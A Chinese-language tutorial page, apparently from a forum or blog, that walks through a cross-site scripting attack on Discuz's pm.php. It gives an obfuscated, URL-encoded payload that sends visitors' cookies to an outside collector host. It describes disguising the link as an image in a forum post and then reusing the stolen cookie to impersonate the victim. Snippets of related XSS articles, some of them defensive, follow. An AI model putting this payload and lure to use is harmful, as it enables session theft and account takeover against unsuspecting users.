跨站脚本攻击+Cookies欺骗(Discuz篇)

这次我拿Discuz示范给大家看,首先我们都知道,Discuz在pm.php的程式中,并没有对

会员名字做过滤,导致我们可以写入一些script.

聪明的同学们,想到了吗?我们正可以利用这个漏洞写一段获取cookies的script.

这是要像看到颜色 就会反应的!(取自 数学补习班= =")

所以我们先从本端 获取自己cookies看看...

例句:

http://www.abc.com/pm.php?action=send&username=看啥?"><script>alert(documents.cookie)</script><

OK? 接下来 我们为了要获取别人的cookies 所以采用跨站台的方式,

首先把让对方看了我们精心构制好的URL.连了之后会到我们构制好的php or asp 程式里面.

并把对方自己的cookies写入 我们的程式中...(如果需要 请googles搜寻 大陆狗 那边一堆)...

所以啦~获取到对方cookies之后,我们找自己在该论坛的cookies记录..

找到之后 把cookies里面的资讯改成对方的使用者名称,以及加密过的md5码...

切记md5码是不可以反逆的~

现在我把原理说完ㄌ...开始实战吧~~小杂碎 快来阿!

现在已经知道pm.php的bug. 我们也已经把php程式上传准备完成.

接下来 我们到论坛发link! P.S. 有些论坛 还可以利用 头像 来欺骗...

全看个人的思维....(想起数学老师ㄌ= =")

我贴了个问电脑问题的文章连结,并附上图片...(嘿嘿重点在图片拉~)

我假设有一个假网址,http://myweb.hinet.net/uarestupid/home1/XXX.jpg

随便你写 只要看起来像个图片 连结就够了....

并把http://myweb.hinet.net/uarestupid/home1/XXX.jpg加上我们漏洞的连结,

所以看起来就是这样:

http://myweb.hinet.net/uarestupid/home1/XXX.jpg

以上这段图片link看起来大家都毫不考虑的认为真的是图片...

其实连结到,

http://www.abc.com/pm.php?action=send&username=fuck%22%3E%3Cscript%3Ewindow.open("%68%74%74%70%3A%2F%2F%6D%65%6D%62%65%72%73%2E%6C%79%63%6F%73%2E%63%6F%2E%75%6B%2F%6A%65%72%65%6D%79%68%63%77%2F%68%2E%70%68%70?"%2Bdocuments.cookie)%3C/script%3E%3Cb%22

以上我已经url编码过了,用功的同学用cookies搜一下吧...

所以呢 他按了图片连结后....把自己的cookies送出去了 = =" 但是他还是可以看到图片...

(0)

相关推荐

  • 跨站脚本攻击+Cookies欺骗(Discuz篇)

    这次我拿Discuz示范给大家看,首先我们都知道,Discuz在pm.php的程式中,并没有对 会员名字做过滤,导致我们可以写入一些script. 聪明的同学们,想到了吗?我们正可以利用这个漏洞写一段获取cookies的script. 这是要像看到颜色 就会反应的!(取自 数学补习班= =") 所以我们先从本端 获取自己cookies看看... 例句: http://www.abc.com/pm.php?action=send&username=看啥?"><scri

  • Cookies 欺骗漏洞的防范方法(vbs+js 实现)

    最后罗嗦一句,本人录入这篇文章用的机器上没有 ASP 环境,所以提供的代码未能进行测试,对这一点本人深表歉意.如果大家发现了代码中的任何问题,欢迎拍砖-本人皮厚- 一.攻击原理 Cookies 欺骗主要利用当前网络上一些用户管理系统将用户登录信息储存在 Cookies 中这一不安全的做法进行攻击,其攻击方法相对于 SQL 注入漏洞等漏洞来说相对要"困难"一些,但还是很"傻瓜". 我们知道,一般的基于 Cookies 的用户系统至少会在 Cookies 中储存两个变量

  • 跨站脚本攻击XSS分类介绍以及解决方案汇总

    目录 1.什么是XSS? 2.XSS 分类 2.1 反射型XSS 2.2 存储型XSS 2.3 DOM型XSS 3.漏洞危害 4.测试方法 5.解决方案 5.1 httpOnly 5.2 客户端过滤 5.3 充分利用CSP 5.5 服务端校验 总结 1.什么是XSS? Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击.攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行.利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie.SessionI

  • 字符集导致的浏览器跨站脚本攻击分析

    |=-------------------------------–=| |=-----–=[ 字符集导致的浏览器跨站脚本攻击 ]=-----–=| |=-------------------------------–=| |=-------------=[ By jianxin ]=------------=| |=-----------=[ jianxin@80sec.com ]=----------=| |=--------------------------------=| 文中<已经被

  • 最新的黑客技术:XSS跨站脚本攻击详细介绍

    总体上介绍 简单介绍什么是XSS攻击 如何寻找XSS漏洞 对于XSS攻击的总体思路 来自内部的攻击: 如何寻找内部的XSS漏洞 如何构造攻击 如何利用 结何实例攻击,如DVBBS&BBSXP 来自外部的攻击 如何构造XSS攻击 如何欺骗管理员打开 XSS与其它技术的结何 与mssql injection的结合 QQ跨站的结何 国内大型统计网站的跨站漏洞 社会工程学 制作恐怖的flash木马 制作方法由李丰初写 总结 正文: XSS总体介绍 什么是XSS攻击 XSS又叫CSS  (Cross Si

  • 研究UBB的跨站脚本攻击之综合篇

    近日,由于发现一些站点仍然存在UBB的跨站脚本攻击的漏洞.跨站脚本攻击虽然很少会对服务器造成一些什么比较大的影响,但对于一个站点来说,存在这种漏洞实在是太不值得!小则,弹点什么东东出来;中则改改主页;重则窃取用户的COOKIES资料,更甚者将会G掉浏览者的硬盘.一个站点被变成一个恶意网站,还有谁敢来?如果再加上该站的站长比较"盲"一些,岂不乱套了?  小小的一段代码就真的能使一个站点成这样?好叫我们来具体的看看所谓的跨站脚本攻击到底会成为什么样的攻击模式.进入一个含UBB功能的站点,比

  • UBB的跨站脚本攻击的漏洞

    近日,由于发现一些站点仍然存在UBB的跨站脚本攻击的漏洞.跨站脚本攻击虽然很少会对服务器造成一些什么比较大的影响,但对于一个站点来说,存在这种漏洞实在是太不值得!小则,弹点 什么东东出来;中则改改主页;重则窃取用户的COOKIES资料,更甚者将会G掉浏览者的硬盘.一个站点被变成一个恶意网站,还有谁敢来?如果再加上该站的站长比较"盲"一些,岂不乱套了? 小小的一段代码就真的能使一个站点成这样?好叫我们来具体的看看所谓的跨站脚本攻击到底会成为什么样的攻击模式.进入一个含UBB功能的站点,比

  • 跨站脚本攻击XSS(Cross Site Script)的原理与常见场景分析

    前言 前段时间在网上看到一个网址,好奇之下进去看了看.胜利的条件是你录入一个串,让其调用prompt(1) .发现里面有好多想不到的东西,今天终于悠闲了来这里说说XSS. XSS 原理 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS.恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目

  • 跨站脚本攻击XSS原理与防范实例分析

    本文实例讲述了跨站脚本攻击XSS原理与防范.分享给大家供大家参考,具体如下: 跨站脚本攻击(Cross Site Script为了区别于CSS简称为XSS)指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的. 一个简单的留言板 我们有个页面用于允许用户发表留言,然后在页面底部显示留言列表 <!DOCTYPE html> <html> <head> <?php include(

  • jQuery Mobile漏洞会有跨站脚本攻击风险

    概述 根据国外媒体的最新报道,谷歌公司的安全工程师Eduardo Vela在jQuery Mobile框架中发现了一个安全漏洞,这个漏洞将会让 所有使用了jQuery Mobile的网站暴露于跨站脚本攻击风险之下 . jQuery Mobile项目(jQuery框架中的一个组件)是一个基于HTML5的开发框架,在它的帮助下,开发者可以设计出能够适配目前主流移动设备和桌面系统的响应式Web站点以及应用程序.实际上,jQuery Mobile不仅可以为主流移动平台提供jQuery的核心库,而且它也是

随机推荐